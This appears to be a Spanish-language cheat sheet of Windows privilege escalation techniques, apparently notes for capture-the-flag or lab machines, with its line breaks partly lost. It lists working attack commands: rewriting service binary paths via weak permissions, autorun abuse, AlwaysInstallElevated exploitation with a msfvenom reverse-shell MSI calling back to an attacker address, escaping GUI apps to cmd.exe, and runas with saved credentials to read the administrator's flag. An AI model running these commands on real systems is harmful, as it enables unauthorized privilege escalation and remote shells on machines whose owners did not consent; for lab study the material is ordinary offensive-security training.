#Enumeración de permisos de usuario sobre un servicio.\accesschk.exe/accepteula -uwcqv <USUARIO><SERVICIO>#Si tiene habilitada la opción “SERVICE_CHANGE_CONFIG” se puede cambiar la configuración del servicio con dicho usuariosc config <SERVICIO> binpath="\"C:\<NUEVO_PATH>""#Cambia el path para el servicionet start <SERVICIO>#Inicia el servicio
Ruta absoluta del servicio sin entrecomillar (Unquoted Service Path)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run #Muestra el registro de ejecutables AutoRunC:\PrivEsc\accesschk.exe/accepteula -wvu "C:\Program Files\Autorun Program\program.exe”#Para que funcione el exploit la máquina tiene que reiniciarse y alguien tiene que iniciar sesión, si es un admin mejor :)
AlwayInstallElevated
#Muestra el registro para los valores de AlwaysInstallElevatedreg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated#Creamos un instalador con msfvenommsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53-f msi -o reverse.msi#Nos ponemos a la escucha con netcat y ejecutamos el instaladormsiexec /quiet /qn /i C:\PrivEsc\reverse.msi
Aplicaciones inseguras con GUI
#Comprobar usuario que está ejecutando la aplicacióntasklist /V | findstr <Programa>.exe#Si es posible, abrir un cmd.exe desde la GUI para obtener sesión como dicho usuario#Por ejemplo: introducir “file://c:/windows/system32/cmd.exe” en la barra de navegación
cmdkey /listC:\Windows\System32\runas.exe /user: <DOMAIN>\<USER> /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt" #Ejemplo para leer la flag de root y almacenarla en otra carpeta
#RunAs es equivalente a “sudo” en Linux